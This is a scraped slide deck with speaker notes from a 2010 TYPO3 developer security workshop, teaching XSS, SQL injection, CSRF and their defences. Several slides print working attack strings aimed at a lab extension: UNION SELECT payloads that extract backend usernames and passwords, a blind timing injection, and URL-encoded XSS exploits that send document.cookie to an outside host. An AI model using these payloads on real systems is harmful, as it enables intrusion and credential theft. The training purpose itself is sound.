Your SlideShare is downloading. ×
0
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
T3DD10 Security Workshop
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

T3DD10 Security Workshop

1,447

Published on

Slides of the T3DD10 Security Workshop

Slides of the T3DD10 Security Workshop

Published in: Technology, News & Politics
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,447
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Who already heard of XSS, CSRF

  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009


  • Application Security, not personal nor gouvernmental


  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he get‘s back, he or she won‘t attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he get‘s back, he or she won‘t attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he get‘s back, he or she won‘t attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he get‘s back, he or she won‘t attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he get‘s back, he or she won‘t attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source

  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />< img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“


  • Input Validation: „a>b“ or „Me & you“

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
    <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  • Input Validation: „a>b“ or „Me & you“

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
    <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  • Input Validation: „a>b“ or „Me & you“

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
    <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter



  • SELECT title, description, body FROM items WHERE ID = 2 and 1=2
    SELECT title, description, body FROM items WHERE ID = 2 and 1=1

    1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

    Defense in depth (saltedpw)
    http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281

  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): ‘‘ are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): ‘‘ are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): ‘‘ are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): ‘‘ are necessary


  • POST can be forged, referrer can be spoofed
    Double Submit Cookies
    *sending session id as cookie and form values
    Downsides: session hijacking, httponly for cookies not valid any more
    Challange-Response:
    *CAPTCHA
    *Re-Authentication (password), confirmation? alert() per javascript klickbar?
    *One-time Token
    Synchronizer Token Pattern
    *Generate one or more random tokens for a session (per session or per request)
    *randomize token variable name (per request downside: browser back button)
    http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution




  • sdfasdfdsafdsafdsafasd
  • Transcript

    • 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
    • 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
    • 3. Introduction Do you ... Inspiring people to T3DD10 Security Workshop share
    • 4. Introduction Do you ... ... know me? Inspiring people to T3DD10 Security Workshop share
    • 5. Introduction Do you ... ... know me? ... have a working development environment? Inspiring people to T3DD10 Security Workshop share
    • 6. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? Inspiring people to T3DD10 Security Workshop share
    • 7. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? Inspiring people to T3DD10 Security Workshop share
    • 8. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? Inspiring people to T3DD10 Security Workshop share
    • 9. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? Inspiring people to T3DD10 Security Workshop share
    • 10. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
    • 11. Did you ever hack for Inspiring people to T3DD10 Security Workshop share
    • 12. Security Flaws versus Security Concepts Agenda General Security Concepts Hacking / Code Review Session Getting into details about some vulnerabilitiy types Writing down best practices for TYPO3 developers Inspiring people to T3DD10 Security Workshop share
    • 13. What is Security? Inspiring people to T3DD10 Security Workshop share
    • 14. Security is not a state Inspiring people to T3DD10 Security Workshop share
    • 15. What is Security? Security is a process Inspiring people to T3DD10 Security Workshop share
    • 16. What is Security? Security is a process The security of an application must be proven over time Inspiring people to T3DD10 Security Workshop share
    • 17. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved Inspiring people to T3DD10 Security Workshop share
    • 18. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... Inspiring people to T3DD10 Security Workshop share
    • 19. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time Inspiring people to T3DD10 Security Workshop share
    • 20. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time The „costs“ for security must relate to the possible impacts Inspiring people to T3DD10 Security Workshop share
    • 21. What is Security? General Security Concepts Inspiring people to T3DD10 Security Workshop share
    • 22. What is Security? General Security Concepts Minimize Exposure / Least privilege Inspiring people to T3DD10 Security Workshop share
    • 23. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Inspiring people to T3DD10 Security Workshop share
    • 24. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Inspiring people to T3DD10 Security Workshop share
    • 25. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Inspiring people to T3DD10 Security Workshop share
    • 26. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Inspiring people to T3DD10 Security Workshop share
    • 27. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Inspiring people to T3DD10 Security Workshop share
    • 28. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Avoid security by obscurity Inspiring people to T3DD10 Security Workshop share
    • 29. Cross Site Scripting (XSS) Inspiring people to T3DD10 Security Workshop share
    • 30. Cross Site Scripting XSS Inspiring people to T3DD10 Security Workshop share
    • 31. Cross Site Scripting XSS Persitent/ non persistent XSS Inspiring people to T3DD10 Security Workshop share
    • 32. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Inspiring people to T3DD10 Security Workshop share
    • 33. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Inspiring people to T3DD10 Security Workshop share
    • 34. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities Inspiring people to T3DD10 Security Workshop share
    • 35. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities <img src="javascript:alert(document.cookie)" / > Inspiring people to T3DD10 Security Workshop share
    • 36. Cross Site Scripting Preventing XSS Inspiring people to T3DD10 Security Workshop share
    • 37. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Inspiring people to T3DD10 Security Workshop share
    • 38. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context Inspiring people to T3DD10 Security Workshop share
    • 39. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src=“... OR HERE ...“ /> ... because then you‘re doomed Inspiring people to T3DD10 Security Workshop share
    • 40. Email Header Injection Inspiring people to T3DD10 Security Workshop share
    • 41. Email Header Injection Email Header Injection PHP mail() function and From: header Use filter_var($mail, FILTER_VALIDATE_EMAIL) do not allow chr(10) or chr(13) Inspiring people to T3DD10 Security Workshop share
    • 42. SQL Injection (SQLi) Inspiring people to T3DD10 Security Workshop share
    • 43. SQL Injection SQLi (blind) SQL Injections Timing attacs UNION SELECT Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1) Check your TypoScript! Inspiring people to T3DD10 Security Workshop share
    • 44. SQL Injection Prevent SQLi Inspiring people to T3DD10 Security Workshop share
    • 45. SQL Injection Prevent SQLi Prepared Statements / PDO Inspiring people to T3DD10 Security Workshop share
    • 46. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Inspiring people to T3DD10 Security Workshop share
    • 47. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Inspiring people to T3DD10 Security Workshop share
    • 48. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Using an ORM (extbase, FLOW3, QCodo, ...) Inspiring people to T3DD10 Security Workshop share
    • 49. Cross Site Request Forgery Inspiring people to T3DD10 Security Workshop share
    • 50. Cross Site Request Forgery CSRF Executing arbitrary actions on behalf of a victim <img src="http://bank.com/transfer.do? acct=MARIA&amount=100000" width="1" height="1" border="0"> stored CSRF (like XSS) Targeted Emails Requires probably some kind of social engineering Inspiring people to T3DD10 Security Workshop share
    • 51. Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
    • 52. Application Vulnerabilities More
    • 53. Application Vulnerabilities More Information Disclosure HTTP Response Splitting Path Traversal Privilege Escalation Session Fixation LPAP Injection Remote Code Execution
    • 54. T3DD10 Security Workshop Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://www.ibm.com/developerworks/ opensource/library/os-php-secure-apps/ index.html http://www.owasp.org/index.php/ Category:OWASP_WebGoat_Project Inspiring people to T3DD10 Security Workshop share
    • 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
    • 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
    • 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
    • 58. inspiring people to share.

    ×